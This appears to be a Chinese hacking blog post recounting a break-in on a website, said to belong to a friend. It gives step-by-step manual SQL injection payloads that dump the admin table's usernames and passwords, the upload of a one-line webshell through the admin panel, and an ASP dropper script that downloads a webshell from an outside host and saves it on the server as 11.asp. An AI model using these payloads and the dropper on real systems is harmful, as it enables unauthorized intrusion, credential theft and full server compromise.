练习手工和数据流上传

刚刚帮朋友测试一个站，打开后发现了注入点，于是手工了一番
Article_Print.asp?ArticleID=770 and (select count(*) from [admin])>0页面返回正常
可以判断存在admin表，于是再Article_Print.asp?ArticleID=770 order by 一番，后来在Article_Print.asp?ArticleID=770 order by 28的时候正常，在Article_Print.asp?ArticleID=770 order by 29的时候出错了，于是继续提交
Article_Print.asp?ArticleID=770 and 1=1 union select 1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin 后返回如下图所示：
 

于是继续提交
Article_Print.asp?ArticleID=770 and 1=1 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
 

哈哈，爆出密码了
继续提交
Article_Print.asp?ArticleID=770 and 1=1 union select 1,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
 

连同帐号密码一起拿下来了
于是习惯性的添加/admin/发现无法打开，然后用JSKY来扫描下，发现了一个1.asp，发现很可疑，于是打开后看见一个空白页面，点击右键看见一片空白，于是继续等待，到后面暴出来/web/Admin_Index.asp郁闷了，早知道直接的用啊D扫了
 

在后台通过抓包上传得到了一个一句话，然后菜刀连接之，成功。
 

准备上传个webshell的时候发现上传失败，失败，继续失败，上传个小马发现也是无法写入。后来测试发现上传10K以上的ASP，很纳闷了。后来在自己的工具箱里面看了下，找到了个关于数据流上传的文件，说是要支持数据流上传的时候可以试试
。
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.iick.blog/2.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("11.asp"),2
set sGet = nothing
set sPOST = nothing
%>
意思是把http://www.iick.blog/2.txt这个文件下载到当前目录保存为11.asp
我没法知道它是不是支持数据流上传，于是死马当活马医的试试，在我的的空间里面传了个webshell，保存为txt文件，把上面的代码保存为c.asp,直接用菜刀传上去，访问发现下面的进度条很慢，等了大约一分钟后，发现进度条走完了，于是访问11.asp
 

呵呵，成功了，一个shell到手